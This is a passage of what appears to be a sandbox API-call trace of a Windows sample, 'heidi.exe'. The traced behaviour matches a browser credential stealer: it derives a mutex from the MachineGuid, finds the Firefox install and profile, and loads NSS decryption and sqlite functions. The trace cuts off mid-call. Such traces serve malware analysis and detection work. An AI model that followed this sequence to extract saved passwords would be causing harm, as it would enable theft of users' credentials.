1153 start_va = 0x773d0000 end_va = 0x77415fff entry_point = 0x773d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1154 start_va = 0x77420000 end_va = 0x774affff entry_point = 0x77420000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1155 start_va = 0x774b0000 end_va = 0x7755bfff entry_point = 0x774b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1156 start_va = 0x77700000 end_va = 0x77718fff entry_point = 0x77700000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1157 start_va = 0x77720000 end_va = 0x77754fff entry_point = 0x77720000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1158 start_va = 0x77b30000 end_va = 0x77b35fff entry_point = 0x77b30000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1159 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1160 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1161 start_va = 0x660000 end_va = 0x7e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1162 start_va = 0x75720000 end_va = 0x757ebfff entry_point = 0x75720000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1163 start_va = 0x75a60000 end_va = 0x75abffff entry_point = 0x75a60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1164 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1165 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1166 start_va = 0x7f0000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1167 start_va = 0x980000 end_va = 0x1d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 1168 start_va = 0x76100000 end_va = 0x76d49fff entry_point = 0x76100000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1169 start_va = 0x76f10000 end_va = 0x76f66fff entry_point = 0x76f10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1170 start_va = 0x1d80000 end_va = 0x204efff entry_point = 0x1d80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1171 start_va = 0x75590000 end_va = 0x755a5fff entry_point = 0x75590000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1172 start_va = 0x220000 end_va = 0x25bfff entry_point = 0x220000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1173 start_va = 0x220000 end_va = 0x25bfff entry_point = 0x220000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1174 start_va = 0x220000 end_va = 0x25bfff entry_point = 0x220000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1175 start_va = 0x220000 end_va = 0x25bfff entry_point = 0x220000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1176 start_va = 0x220000 end_va = 0x25bfff entry_point = 0x220000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1177 start_va = 0x75550000 end_va = 0x7558afff entry_point = 0x75550000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1178 start_va = 0x75390000 end_va = 0x75544fff entry_point = 0x75390000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll") Region: id = 1179 start_va = 0x75350000 end_va = 0x75381fff entry_point = 0x75350000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1180 start_va = 0x75340000 end_va = 0x75346fff entry_point = 0x75340000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 1181 start_va = 0x75280000 end_va = 0x7533efff entry_point = 0x75280000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 1182 start_va = 0x75250000 end_va = 0x75271fff entry_point = 0x75250000 region_type = mapped_file name = "mozglue.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll") Region: id = 1183 start_va = 0x751e0000 end_va = 0x75248fff entry_point = 0x751e0000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\SysWOW64\\msvcp100.dll" (normalized: "c:\\windows\\syswow64\\msvcp100.dll") Region: id = 1184 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1185 start_va = 0x2050000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1186 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1187 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1188 start_va = 0x2150000 end_va = 0x2250fff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1189 start_va = 0x2150000 end_va = 0x224ffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1190 start_va = 0x2200000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1191 start_va = 0x751b0000 end_va = 0x751d6fff entry_point = 0x751b0000 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll") Region: id = 1192 start_va = 0x75190000 end_va = 0x751a6fff entry_point = 0x75190000 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll") Region: id = 1193 start_va = 0x230000 end_va = 0x230fff entry_point = 0x230000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1194 start_va = 0x240000 end_va = 0x246fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1195 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1196 start_va = 0x2300000 end_va = 0x26f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 1197 start_va = 0x230000 end_va = 0x230fff entry_point = 0x230000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1198 start_va = 0x75140000 end_va = 0x7518efff entry_point = 0x75140000 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll") Region: id = 1199 start_va = 0x2700000 end_va = 0x2800fff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1200 start_va = 0x230000 end_va = 0x234fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1201 start_va = 0x75540000 end_va = 0x7554bfff entry_point = 0x75540000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 1202 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1203 start_va = 0x2700000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1204 start_va = 0x75530000 end_va = 0x7553afff entry_point = 0x75530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1205 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1206 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1207 start_va = 0x75510000 end_va = 0x75520fff entry_point = 0x75510000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1208 start_va = 0x75500000 end_va = 0x75508fff entry_point = 0x75500000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1209 start_va = 0x754e0000 end_va = 0x754f8fff entry_point = 0x754e0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1210 start_va = 0x754d0000 end_va = 0x754defff entry_point = 0x754d0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1211 start_va = 0x754c0000 end_va = 0x754cefff entry_point = 0x754c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1212 start_va = 0x754a0000 end_va = 0x754b1fff entry_point = 0x754a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 1213 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1214 start_va = 0x2800000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1215 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1216 start_va = 0x75480000 end_va = 0x75496fff entry_point = 0x75480000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1217 start_va = 0x75b90000 end_va = 0x75cacfff entry_point = 0x75b90000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1218 start_va = 0x75e00000 end_va = 0x75e0bfff entry_point = 0x75e00000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1219 start_va = 0x75440000 end_va = 0x7547bfff entry_point = 0x75440000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1220 start_va = 0x753f0000 end_va = 0x75433fff entry_point = 0x753f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1221 start_va = 0x4b0000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1222 start_va = 0x753d0000 end_va = 0x753ebfff entry_point = 0x753d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1223 start_va = 0x753c0000 end_va = 0x753c6fff entry_point = 0x753c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1224 start_va = 0x75380000 end_va = 0x753b7fff entry_point = 0x75380000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1225 start_va = 0x2900000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1226 start_va = 0x75370000 end_va = 0x75375fff entry_point = 0x75370000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1227 start_va = 0x2150000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1228 start_va = 0x75360000 end_va = 0x75365fff entry_point = 0x75360000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1229 start_va = 0x75350000 end_va = 0x75354fff entry_point = 0x75350000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1230 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1231 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1232 start_va = 0x2900000 end_va = 0x29fffff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1233 start_va = 0x2af0000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 1234 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1235 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1236 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1237 start_va = 0x2b30000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 1238 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Thread: id = 47 os_tid = 0xa74 [0133.400] GetCommandLineW () returned="\"C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe\" " [0133.401] LoadLibraryW (lpLibFileName="SHELL32") returned 0x76100000 [0133.403] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe\" ", pNumArgs=0x18ff84 | out: pNumArgs=0x18ff84) returned 0x5750a8*="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" [0133.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0133.404] StrStrW (lpFirst="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe", lpSrch="-u") returned 0x0 [0133.404] SetErrorMode (uMode=0x3) returned 0x0 [0133.404] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x757f0000 [0133.405] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77720000 [0133.405] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x75e10000 [0133.405] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fd84 | out: lpWSAData=0x18fd84) returned 0 [0133.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.411] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fee4 | out: phkResult=0x18fee4*=0xa4) returned 0x0 [0133.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.411] RegQueryValueExA (in: hKey=0xa4, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x579408, lpcbData=0x18fee0*=0x208 | out: lpType=0x0, lpData=0x579408*=0x37, lpcbData=0x18fee0*=0x25) returned 0x0 [0133.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.412] RegCloseKey (hKey=0xa4) returned 0x0 [0133.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.413] CryptAcquireContextW (in: phProv=0x18fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18fec4*=0x5796b8) returned 1 [0133.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.423] CryptCreateHash (in: hProv=0x5796b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18fec8 | out: phHash=0x18fec8) returned 1 [0133.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.423] CryptHashData (hHash=0x57b848, pbData=0x579408, dwDataLen=0x24, dwFlags=0x0) returned 1 [0133.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.424] CryptGetHashParam (in: hHash=0x57b848, dwParam=0x2, pbData=0x574448, pdwDataLen=0x18fec0, dwFlags=0x0 | out: pbData=0x574448, pdwDataLen=0x18fec0) returned 1 [0133.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.425] CryptDestroyHash (hHash=0x57b848) returned 1 [0133.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0133.425] CryptReleaseContext (hProv=0x5796b8, dwFlags=0x0) returned 1 [0133.426] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x579658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0133.426] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x579658, cbMultiByte=-1, lpWideCharStr=0x579698, cchWideChar=33 | out: lpWideCharStr="73EE9CC98E5412EEF2B9A336F506D7EE") returned 33 [0133.426] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="73EE9CC98E5412EEF2B9A336") returned 0xa4 [0133.426] GetLastError () returned 0x0 [0133.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0133.427] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fba0*=0x104 | out: pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fba0*=0x1a) returned 0x0 [0133.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0133.428] StrStrW (lpFirst="25.0 (en-US)", lpSrch="x64") returned 0x0 [0133.428] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0133.429] wvsprintfW (in: param_1=0x57cff0, param_2="%s\\%s\\Main", arglist=0x18fbac | out: param_1="SOFTWARE\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main") returned 50 [0133.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0133.429] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", pszValue="Install Directory", pdwType=0x0, pvData=0x57cff0, pcbData=0x18fb88*=0x104 | out: pdwType=0x0, pvData=0x57cff0, pcbData=0x18fb88*=0x4e) returned 0x0 [0133.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49b980, nSize=0x3f3f | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x18bc64, nSize=0x3f3e | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0133.431] StrCatW (in: psz1="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", psz2=";" | out: psz1="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;") returned="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;" [0133.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0133.431] StrCatW (in: psz1="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;", psz2="C:\\Program Files (x86)\\Mozilla Firefox" | out: psz1="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files (x86)\\Mozilla Firefox" [0133.432] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files (x86)\\Mozilla Firefox") returned 1 [0133.432] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0133.432] wvsprintfW (in: param_1=0x57e350, param_2="%s\\nss3.dll", arglist=0x18bc54 | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 47 [0133.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0133.433] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 1 [0133.456] LoadLibraryW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 0x75390000 [0134.081] GetProcAddress (hModule=0x75390000, lpProcName="NSS_Init") returned 0x7544d70b [0134.084] GetProcAddress (hModule=0x75390000, lpProcName="NSS_Shutdown") returned 0x7544d13c [0134.084] GetProcAddress (hModule=0x75390000, lpProcName="PK11_GetInternalKeySlot") returned 0x753e3c51 [0134.085] GetProcAddress (hModule=0x75390000, lpProcName="PK11_FreeSlot") returned 0x753e3333 [0134.085] GetProcAddress (hModule=0x75390000, lpProcName="PK11_Authenticate") returned 0x753cd3ca [0134.085] GetProcAddress (hModule=0x75390000, lpProcName="PK11SDR_Decrypt") returned 0x753e00a7 [0134.086] GetProcAddress (hModule=0x75390000, lpProcName="PK11_CheckUserPassword") returned 0x753ccbc4 [0134.086] GetProcAddress (hModule=0x75390000, lpProcName="SECITEM_FreeItem") returned 0x7544e656 [0134.086] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.087] wvsprintfW (in: param_1=0x57e350, param_2="%s\\%s", arglist=0x18bc50 | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\sqlite3.dll") returned 50 [0134.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.087] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\sqlite3.dll") returned 0 [0134.088] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.088] wvsprintfW (in: param_1=0x57e350, param_2="%s\\%s", arglist=0x18bc50 | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\mozsqlite3.dll") returned 53 [0134.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.088] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\mozsqlite3.dll") returned 0 [0134.089] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.089] wvsprintfW (in: param_1=0x57e350, param_2="%s\\%s", arglist=0x18bc50 | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 47 [0134.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.090] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 1 [0134.090] LoadLibraryW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 0x75390000 [0134.091] GetProcAddress (hModule=0x75390000, lpProcName="sqlite3_finalize") returned 0x754c9f60 [0134.092] GetProcAddress (hModule=0x75390000, lpProcName="sqlite3_step") returned 0x754e5200 [0134.092] GetProcAddress (hModule=0x75390000, lpProcName="sqlite3_close") returned 0x754cbde0 [0134.092] GetProcAddress (hModule=0x75390000, lpProcName="sqlite3_column_text") returned 0x7549d400 [0134.092] GetProcAddress (hModule=0x75390000, lpProcName="sqlite3_open16") returned 0x754f1cd0 [0134.093] GetProcAddress (hModule=0x75390000, lpProcName="sqlite3_prepare_v2") returned 0x7547cea0 [0134.093] LoadLibraryW (lpLibFileName="SHELL32") returned 0x76100000 [0134.093] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5610c8 | out: pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming") returned 0x0 [0134.095] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.096] wvsprintfW (in: param_1=0x57e458, param_2="%s\\Mozilla\\Firefox\\profiles.ini", arglist=0x18f340 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 62 [0134.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.096] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 1 [0134.099] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.099] wvsprintfW (in: param_1=0x57e458, param_2="Profile%i", arglist=0x18f340 | out: param_1="Profile0") returned 8 [0134.100] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault=0x0, lpReturnedString=0x582468, nSize=0x400, lpFileName="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/p7ap74gw.default") returned 0x19 [0134.101] GetLastError () returned 0x0 [0134.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.101] StrStrW (lpFirst="Profiles/p7ap74gw.default", lpSrch="Profiles/") returned="Profiles/p7ap74gw.default" [0134.102] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.102] wvsprintfW (in: param_1=0x57e458, param_2="%s\\Mozilla\\Firefox\\Profiles\\%s", arglist=0x18f33c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default") returned 75 [0134.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0134.103] WideCharToMultiByte (in: 